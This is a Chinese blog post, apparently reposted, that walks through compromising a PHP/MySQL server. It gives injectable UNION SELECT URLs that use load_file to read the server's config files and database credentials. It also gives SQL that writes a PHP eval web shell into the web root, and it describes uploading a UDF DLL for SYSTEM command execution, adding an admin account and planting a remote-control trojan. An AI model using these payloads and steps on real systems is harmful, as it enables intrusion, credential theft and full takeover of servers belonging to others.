這里重點感謝一下JJ童鞋，我與該童鞋相識好幾年了，不過從未見過面，但是卻很投緣啊（哈哈，我不是gay），發現很多時候一起做事很有默契，我也是好久沒碰php了，完全忘記怎么玩了，今天拉他來一起搞了一下，實踐證明，合作的力量是偉大滴，成功拿下整臺服務器權限，于是便有了本文，由于我寫完之后要整理一下寫到報告里面，所以會寫的詳細一些，大牛們請飄過。。。（廢話多了點兒，誰拿磚頭砸我？！） 現在開始： 注入點：http://www.12345.com/page.php?id=2 '和and 1=1；and 1=2證明可注。 order by 判斷字段數25 union select得到可查變量：2、17 將2或17替換為user() database() version()沒有任何信息，原因目前未找到，請看到的大牛指點一二。 ping一下域名：www.12345.com返回TTL：113，判斷為Windows操作系統 用load_file()函數讀虛擬主機配置文件c:\windows\system32\inetsrv\MetaBase.xml，想辦法得到網站路徑,發現讀出的是一個漢字（應該是二進制亂碼） 于是嘗試使用hex replace將char的二進制內容轉換為16進制，并將<轉換為空格，防止有php等內容無法讀出來： http://www.12345.com/page.php?id=2 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,hex(replace(load_file(char(99 ,58 ,92 ,119 ,105 ,110 ,100 ,111 ,119 ,115 ,92 ,115 ,121 ,115 ,116 ,101 ,109 ,51 ,50 ,92 ,105 ,110 ,101 ,116 ,115 ,114 ,118 ,92 ,77 ,101 ,116 ,97 ,66 ,97 ,115 ,101 ,46 ,120 ,109 ,108)),0x3c,0x20)),18,19,20,21,22,23,24,25/* 將讀出的內容復制到Winhex當中，然后另存為123.txt，并讀出網站路徑： 用load_file()函數讀取網站首頁index.php內容： http://www.12345.com/page.php?id=2%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(0x443A5C7069616E6F5F74656D705C7777775C696E6465782E706870),18,19,20,21,22,23,24,25/* 發現首頁調用head.php文件 繼續讀head.php http://www.12345.com/page.php?id=2%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(0x443A5C7069616E6F5F74656D705C7777775C686561642E706870),18,19,20,21,22,23,24,25/* 發現head.php調用了Include\config.inc.php 繼續讀Include\config.inc.php 到了這里，終于得到了mysql的賬戶密碼以及數據庫名還有端口號等信息。(為什么我不直接讀mysql的配置文件呢？讀不到。為什么我讀完 index.php里沒發現config.inc.php呢？不知道哦，程序就是這么寫的，在head.php里調用config然后首頁調用 head。) 打開MySQL Query Browser，輸入帳號密碼連接數據庫 分別執行以下SQL語句給網站插入一句話***： Create TABLE g(cmd text NOT NULL); //建立g表，里面就一個cmd字段 Insert INTO g (cmd) VALUES('&lt;? php eval($_POST[1]);?>'); //把一句話***插入到g表 Select cmd from g into out file 'D:\piano_temp\www\Include\1.php; //查詢g表中的一句話并把結果導入到1.php Drop TABLE IF EXISTS g; //刪除表g 這樣，我們就得到了一句話***的服務端：http://www.12345pok.com/Include/1.php 用客戶端進行連接 直接上傳提權用的udf.php 填寫好信息后點擊提交： 將導出路徑改為系統路徑，并導出udf.dll，這里我改為C:\Windows\system\udf.dll 執行SQL命令： select cmdshell ('whoami'); 既然是system，接下來很自然直接添加賬戶并提升為管理員組 下面不演示了，對方開了遠程終端，但是卻連接不上，讀注冊表發現端口沒被更改，但是卻無法連接，netstat -na命令也看不到這個端口，于是隨便找了個遠控上傳，運行，服務器沒殺軟，幾百年前的遠控都OK。 部分敏感內容已處理- -！因為是昨晚寫的文章，今天下午才做處理，不知道會不會有的地方改出錯誤了。。。發現文章不通的話請聯系我。 轉載可以，但是請完整。提個醒兒，51cto圖片不支持外鏈。

轉載于:https://blog.51cto.com/mrsun/190455

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的从php+mysql环境的注入，到整台服务器的沦陷的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。